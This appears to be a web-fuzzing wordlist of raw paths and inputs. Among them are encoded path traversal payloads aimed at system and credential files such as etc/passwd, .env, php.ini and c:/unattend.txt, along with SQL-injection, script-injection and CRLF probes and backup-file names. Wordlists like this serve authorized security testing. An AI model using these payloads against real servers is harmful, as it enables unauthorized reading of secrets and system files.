apache\php\php.ini%00
etc/passwd
/
cgi-bin/../../../../../..
.%2e/.%2e/.%2e/.%2e/.%2e/
FUZZ
%FUZZ
../../../etc
;//../../.env
..;//..;/.env
a\.aspx
%e0%40%ae%e0%40%ae%c0%af%e0%40%ae%e0%40%ae%c0%afc:/unattend.txt
%e0%40%ae%e0%40%ae%c0%af%e0%40%ae%e0%40%ae%c0%afc:/unattend.txt%00
%e0%40%ae%e0%40%ae%c0%af%e0%40%ae%e0%40%ae%c0%af%00c:/unattend.txt
%e0%40%ae%e0%40%ae%c0%af%e0%40%ae%e0%40%ae%c0%af%e0%40%ae%e0%40%ae%c0%afc:/unattend.txt
%e0%40%ae%e0%40%ae%c0%80%5cvar/log/mail%00%00
%e0%40%ae%e0%40%ae%c0%80%5c%00var/log/mail%00
%2e%2e/c:/system volume information/wpsettings.dat%00
../../../$dddddd/etc$eeeeeee/passwd$fffffff
%e0%40%ae%e0%40%ae%c0%80%5c%e0%40%ae%e0%40%ae%c0%80%5cvar/log/mail%00
%e0%40%ae%e0%40%ae%c0%af%e0%40%ae%e0%40%ae%c0%af%e0%40%ae%e0%40%ae%c0%afc:/unattend.txt%00
javascript:
FUZZ%00
fuzz'--
$fuzz'--
%00
[ADS]
{sdfsg}
_sddfhkjhsfkjhs
(evil)
'aaa=a
.bak'
<script>
%0d%0afuzz
#
?
..;/
.0
.7z
.AppleDB
.AppleDesktop
.AppleDouble
.CSV
.CVS
.bak
*._responsive.config-data.oms.html
%2e%2e//
user:checklogin.html
muracms.esproj
m/html
.htaccess.sample
.htaccess.save
.htaccess_extra
.htaccessBAK
anal
hardcore
۴۰۴
404alert(1)
%3f/
11:http:www.gotable.com
...........
...
&
%3f/
:
5.
500.
